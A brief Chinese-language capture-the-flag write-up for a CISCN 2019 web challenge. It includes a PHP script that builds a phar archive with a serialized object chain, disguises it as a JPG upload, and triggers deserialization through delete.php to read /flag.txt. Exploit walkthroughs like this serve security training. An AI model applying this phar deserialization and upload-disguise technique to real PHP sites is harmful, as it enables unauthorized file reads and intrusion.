[CTFTraining] CISCN 2019 华北赛区 Day1 Web1

题目打开后是这样的：

先进行注册，然后登录上去：

注意左上角有一个上传文件，这时候构造phar.phar进行上传

<?phpclass User {public $db;}class FileList {private $files;private $results;private $funcs;public function __construct() {$file = new File();$file->filename = '/flag.txt';$this->files = array($file);$this->results = array();$this->funcs = array();}}class File {public $filename;}ini_set('phar.readonly',0);@unlink("phar.phar");$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$o = new User();$o->db = new FileList();$phar->setMetadata($o); //将自定义的meta-data存入manifest$phar->addFromString("exp.txt", "glzjin"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();
?>

构造出来的phar.phar重新命名为phar.jpg然后进行上传

最后访问/delete.php、POST传参filename=phar://phar.jpg/exp.txt得到flag